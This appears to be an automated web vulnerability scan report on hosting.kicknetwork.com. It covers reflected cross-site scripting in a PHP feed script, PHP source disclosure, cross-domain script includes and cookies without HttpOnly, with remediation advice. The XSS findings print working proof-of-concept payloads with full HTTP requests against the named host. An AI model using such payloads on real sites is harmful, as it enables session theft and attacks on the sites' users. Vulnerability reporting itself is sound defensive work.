XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, hosting.kicknetworks.com

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

1.1. http://hosting.kicknetwork.com/afterdark/utils/featuredBookFeed.php [as parameter] next

Summary

Severity:	High
Confidence:	Firm
Host:	http://hosting.kicknetwork.com
Path:	/afterdark/utils/featuredBookFeed.php

Issue detail

The value of the as request parameter is copied into the HTML document as plain text between tags. The payload 88923<a>ea920b924b0 was submitted in the as parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /afterdark/utils/featuredBookFeed.php?as=15917688923<a>ea920b924b0&type=Free%20Books HTTP/1.1
Host: hosting.kicknetwork.com
Proxy-Connection: keep-alive
Referer: http://serve.a-widget.com/service/getWidgetSwf.kickAction
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 18:32:26 GMT
Server: Apache/2.2.14 (EL)
X-Powered-By: PHP/5.2.11
Content-Length: 1623
Content-Type: text/xml
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:georss="http://www.georss.org/georss/"
...[SNIP]...
<link>/afterdark/utils/featuredBookFeed.php?as=15917688923<a>ea920b924b0&type=Free%20Books</link>
...[SNIP]...

1.2. http://hosting.kicknetwork.com/afterdark/utils/featuredBookFeed.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hosting.kicknetwork.com
Path:	/afterdark/utils/featuredBookFeed.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the XML document as plain text between tags. The payload 6c775<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>7aca93a0258 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6c775<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>7aca93a0258 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

GET /afterdark/utils/featuredBookFeed.php?as=159176&type=Free%20B/6c775<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>7aca93a0258ooks HTTP/1.1
Host: hosting.kicknetwork.com
Proxy-Connection: keep-alive
Referer: http://serve.a-widget.com/service/getWidgetSwf.kickAction
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 18:32:37 GMT
Server: Apache/2.2.14 (EL)
X-Powered-By: PHP/5.2.11
Content-Length: 1798
Content-Type: text/xml
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:georss="http://www.georss.org/georss/"
...[SNIP]...
<title>Featured Free B/6c775<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>7aca93a0258ooks 2011-04-28 00:00:00</title>
...[SNIP]...

1.3. http://hosting.kicknetwork.com/afterdark/utils/featuredBookFeed.php [type parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hosting.kicknetwork.com
Path:	/afterdark/utils/featuredBookFeed.php

Issue detail

The value of the type request parameter is copied into the XML document as plain text between tags. The payload d4e58<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>f46b424b6a5 was submitted in the type parameter. This input was echoed as d4e58<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>f46b424b6a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

GET /afterdark/utils/featuredBookFeed.php?as=159176&type=Free%20Booksd4e58<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>f46b424b6a5 HTTP/1.1
Host: hosting.kicknetwork.com
Proxy-Connection: keep-alive
Referer: http://serve.a-widget.com/service/getWidgetSwf.kickAction
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 18:32:34 GMT
Server: Apache/2.2.14 (EL)
X-Powered-By: PHP/5.2.11
Content-Length: 1796
Content-Type: text/xml
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:georss="http://www.georss.org/georss/"
...[SNIP]...
<title>Featured Free Booksd4e58<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>f46b424b6a5 2011-04-28 00:00:00</title>
...[SNIP]...

2. Source code disclosure previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://hosting.kicknetwork.com
Path:	/afterdark/js/ka_romance.js

Issue detail

The application appears to disclose some server-side source code written in PHP.

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

Request

GET /afterdark/js/ka_romance.js HTTP/1.1
Host: hosting.kicknetwork.com
Proxy-Connection: keep-alive
Referer: http://pocketafterdark.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 18:25:36 GMT
Server: Apache/2.2.8 (EL)
Last-Modified: Mon, 24 Jan 2011 17:21:03 GMT
ETag: "1ae8002-de19-49a9ad307fdc0"
Accept-Ranges: bytes
Content-Length: 56857
Content-Type: application/x-javascript
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=35a4a8c000005000; Path=/; Max-age=1800

var p_validateOtherFields = '';
var p_formObj = '';
var p_tagsFailed = '';
var discussionId = -1;
var reloadNow=0;

$j(document).ready(function(){
   if(Ka.Info.PAGETYPE=='Group'){
       if(Ka.Info.USERID
...[SNIP]...
blish_callback',
        url: url,
        success: ka_twitter_publish_callback
       });
   }
}

function ka_twitter_publish_callback(json){
   //alert('ka_twitter_publish_callback'+json.status_code);
   var pageUrl = '<?php echo $id; ?>';
   if(json.status_code=='200'){
       pageUrl = unescape(json.data.url);
   }

   var currentDateObject = new Date();
   var currentHours = currentDateObject.getHours();
   var currentMinutes = currentDateObject
...[SNIP]...

3. Cross-domain script include previous next
There are 2 instances of this issue:

/afterdark/js/ka_romance.js
/afterdark/polldaddy.html

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

3.1. http://hosting.kicknetwork.com/afterdark/js/ka_romance.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosting.kicknetwork.com
Path:	/afterdark/js/ka_romance.js

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.kickstatic.com/kickapps/jsc/4_5_59/StarManager.js
http://s7.addthis.com/js/200/addthis_widget.js?_=1277489681920

Request

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 18:25:36 GMT
Server: Apache/2.2.8 (EL)
Last-Modified: Mon, 24 Jan 2011 17:21:03 GMT
ETag: "1ae8002-de19-49a9ad307fdc0"
Accept-Ranges: bytes
Content-Length: 56857
Content-Type: application/x-javascript
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=35a4a8c000005000; Path=/; Max-age=1800

var p_validateOtherFields = '';
var p_formObj = '';
var p_tagsFailed = '';
var discussionId = -1;
var reloadNow=0;

$j(document).ready(function(){
   if(Ka.Info.PAGETYPE=='Group'){
       if(Ka.Info.USERID
...[SNIP]...
nfo.ISUSERMEMBER==false){
               joinClub(this);


           }
       }
   }

   if (Ka.Info.PAGE == "pages/customPage.jsp") {
       if (window.location.href.indexOf("&type=booklist") != -1) {
           $j('head').append('<script src="http://js.kickstatic.com/kickapps/jsc/4_5_59/StarManager.js"></script>
...[SNIP]...
</div>');
       $j('head').append('<script src="http://s7.addthis.com/js/200/addthis_widget.js?_=1277489681920"></script>
...[SNIP]...

3.2. http://hosting.kicknetwork.com/afterdark/polldaddy.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosting.kicknetwork.com
Path:	/afterdark/polldaddy.html

Issue detail

The response dynamically includes the following script from another domain:

http://static.polldaddy.com/w/34089.js

Request

GET /afterdark/polldaddy.html HTTP/1.1
Host: hosting.kicknetwork.com
Proxy-Connection: keep-alive
Referer: http://pocketafterdark.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 18:29:08 GMT
Server: Apache/2.2.14 (EL)
Last-Modified: Tue, 21 Dec 2010 23:24:32 GMT
ETag: "68d229-404-497f3f0582c00"
Accept-Ranges: bytes
Content-Length: 1028
Content-Type: text/html; charset=UTF-8
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</noscript>
-->

<script type="text/javascript" charset="utf-8" src="http://static.polldaddy.com/w/34089.js"></script>
...[SNIP]...

4. Cookie without HttpOnly flag set previous next
There are 45 instances of this issue:

/afterdark/css/ka_afterdark.css
/afterdark/home_ad.html
/afterdark/images/bg.jpg
/afterdark/images/communityNav.png
/afterdark/images/go_bt.gif
/afterdark/images/grabWidget.jpg
/afterdark/images/header-topcolors.jpg
/afterdark/images/joinBt.jpg
/afterdark/images/kangaroo.png
/afterdark/images/leftBt.png
/afterdark/images/logo.jpg
/afterdark/images/menu-sprite.jpg
/afterdark/images/menu_sprite.jpg
/afterdark/images/newsletterBg.png
/afterdark/images/pollBg.png
/afterdark/images/pollheader.png
/afterdark/images/rightArrow.png
/afterdark/images/rightBt.png
/afterdark/images/shadow.png
/afterdark/images/shoppingcart.jpg
/afterdark/images/submitBt.png
/afterdark/images/subnav.gif
/afterdark/images/tab_blogs.jpg
/afterdark/images/thisMonth.png
/afterdark/images/vipHeader.png
/afterdark/js/Champagne__Limousines_200-Champagne__Limousines_500-Champagne__Limousines_italic_200-Champagne__Limousines_italic_500.font.js
/afterdark/js/cookies.js
/afterdark/js/cufon-yui.js
/afterdark/js/font-replace.js
/afterdark/js/jquery.colorbox-min.js
/afterdark/js/jquery.colorbox.css
/afterdark/js/jquery.form.js
/afterdark/js/jquery.metadata.min.js
/afterdark/js/jquery.rating.css
/afterdark/js/jquery.rating.js
/afterdark/js/ka_afterdark.js
/afterdark/js/ka_afterdark_facebook.js
/afterdark/js/ka_romance.js
/afterdark/js/legal_pages.js
/afterdark/polldaddy.html
/afterdark/smoothmenu/ddsmoothmenu-v.css
/afterdark/smoothmenu/ddsmoothmenu.css
/afterdark/smoothmenu/ddsmoothmenu.js
/afterdark/utils/featuredBookFeed.php
/crossdomain.xml

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

4.1. http://hosting.kicknetwork.com/afterdark/css/ka_afterdark.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosting.kicknetwork.com
Path:	/afterdark/css/ka_afterdark.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BNI__BARRACUDA_LB_COOKIE=35a4a8c000005000; Path=/; Max-age=1800

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /afterdark/css/ka_afterdark.css HTTP/1.1
Host: hosting.kicknetwork.com
Proxy-Connection: keep-alive
Referer: http://pocketafterdark.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 18:25:36 GMT
Server: Apache/2.2.8 (EL)
Last-Modified: Tue, 21 Dec 2010 23:24:31 GMT
ETag: "31719f8-ccb3-497f3f048e9c0"
Accept-Ranges: bytes
Content-Length: 52403
Content-Type: text/css
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=35a4a8c000005000; Path=/; Max-age=1800

* {padding: 0; margin:0; font-family: Verdana, sans-serif; }

body {background: url(../images/bg.jpg) repeat; }

/* DISPLAY: NONE -------------------------------- */
#ka_since, li#ka_mkpTheme a, #ka_
...[SNIP]...

4.2. http://hosting.kicknetwork.com/afterdark/home_ad.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosting.kicknetwork.com
Path:	/afterdark/home_ad.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /afterdark/home_ad.html HTTP/1.1
Host: hosting.kicknetwork.com
Proxy-Connection: keep-alive
Referer: http://pocketafterdark.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 18:29:09 GMT
Server: Apache/2.2.14 (EL)
Last-Modified: Tue, 21 Dec 2010 23:24:32 GMT
ETag: "68cec8-9f6-497f3f0582c00"
Accept-Ranges: bytes
Content-Length: 2550
Content-Type: text/html; charset=UTF-8
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

4.3. http://hosting.kicknetwork.com/afterdark/images/bg.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosting.kicknetwork.com
Path:	/afterdark/images/bg.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /afterdark/images/bg.jpg HTTP/1.1
Host: hosting.kicknetwork.com
Proxy-Connection: keep-alive
Referer: http://pocketafterdark.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 18:25:53 GMT
Server: Apache/2.2.14 (EL)
Last-Modified: Tue, 21 Dec 2010 23:24:31 GMT
ETag: "68ce46-11e56-497f3f048e9c0"
Accept-Ranges: bytes
Content-Length: 73302
Content-Type: image/jpeg
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... .......

.

..........................................................................................................J.L..
...[SNIP]...

4.4. http://hosting.kicknetwork.com/afterdark/images/communityNav.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosting.kicknetwork.com
Path:	/afterdark/images/communityNav.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /afterdark/images/communityNav.png HTTP/1.1
Host: hosting.kicknetwork.com
Proxy-Connection: keep-alive
Referer: http://pocketafterdark.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 18:26:20 GMT
Server: Apache/2.2.14 (EL)
Last-Modified: Tue, 21 Dec 2010 23:24:31 GMT
ETag: "68d00e-1148-497f3f048e9c0"
Accept-Ranges: bytes
Content-Length: 4424
Content-Type: image/png
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

.PNG
.
...IHDR.......U.......K.... pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*! .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

4.5. http://hosting.kicknetwork.com/afterdark/images/go_bt.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosting.kicknetwork.com
Path:	/afterdark/images/go_bt.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /afterdark/images/go_bt.gif HTTP/1.1
Host: hosting.kicknetwork.com
Proxy-Connection: keep-alive
Referer: http://pocketafterdark.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 18:26:40 GMT
Server: Apache/2.2.14 (EL)
Last-Modified: Tue, 21 Dec 2010 23:24:31 GMT
ETag: "68ce0e-1fc-497f3f048e9c0"
Accept-Ranges: bytes
Content-Length: 508
Content-Type: image/gif
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

GIF89a.....*........4;........5....sx.x}....AH....5=....3:....JP.QX.......jp......................}..08.@G....:B.......pu....+3.OU.\b....&..............................................................
...[SNIP]...

4.6. http://hosting.kicknetwork.com/afterdark/images/grabWidget.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosting.kicknetwork.com
Path:	/afterdark/images/grabWidget.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /afterdark/images/grabWidget.jpg HTTP/1.1
Host: hosting.kicknetwork.com
Proxy-Connection: keep-alive
Referer: http://pocketafterdark.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 18:26:40 GMT
Server: Apache/2.2.14 (EL)
Last-Modified: Tue, 21 Dec 2010 23:24:31 GMT
ETag: "68ce4b-1cd3-497f3f048e9c0"
Accept-Ranges: bytes
Content-Length: 7379
Content-Type: image/jpeg
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... .......

.

..........................................................................................................D.=..
...[SNIP]...

4.7. http://hosting.kicknetwork.com/afterdark/images/header-topcolors.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosting.kicknetwork.com
Path:	/afterdark/images/header-topcolors.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /afterdark/images/header-topcolors.jpg HTTP/1.1
Host: hosting.kicknetwork.com
Proxy-Connection: keep-alive
Referer: http://pocketafterdark.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 18:26:20 GMT
Server: Apache/2.2.14 (EL)
Last-Modified: Tue, 21 Dec 2010 23:24:31 GMT
ETag: "68d00a-19b-497f3f048e9c0"
Accept-Ranges: bytes
Content-Length: 411
Content-Type: image/jpeg
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... .......

.

............................................................................................................i..
...[SNIP]...

4.8. http://hosting.kicknetwork.com/afterdark/images/joinBt.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosting.kicknetwork.com
Path:	/afterdark/images/joinBt.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /afterdark/images/joinBt.jpg HTTP/1.1
Host: hosting.kicknetwork.com
Proxy-Connection: keep-alive
Referer: http://pocketafterdark.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 18:26:40 GMT
Server: Apache/2.2.14 (EL)
Last-Modified: Tue, 21 Dec 2010 23:24:31 GMT
ETag: "68ce20-790-497f3f048e9c0"
Accept-Ranges: bytes
Content-Length: 1936
Content-Type: image/jpeg
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... .......

.

..........................................................................................................!.\..
...[SNIP]...

4.9. http://hosting.kicknetwork.com/afterdark/images/kangaroo.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hosting.kicknetwork.com
Path:	/afterdark/images/kangaroo.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BNI__BARRACUDA_LB_COOKIE=37a4a8c000005000; Path=/; Max-age=1800

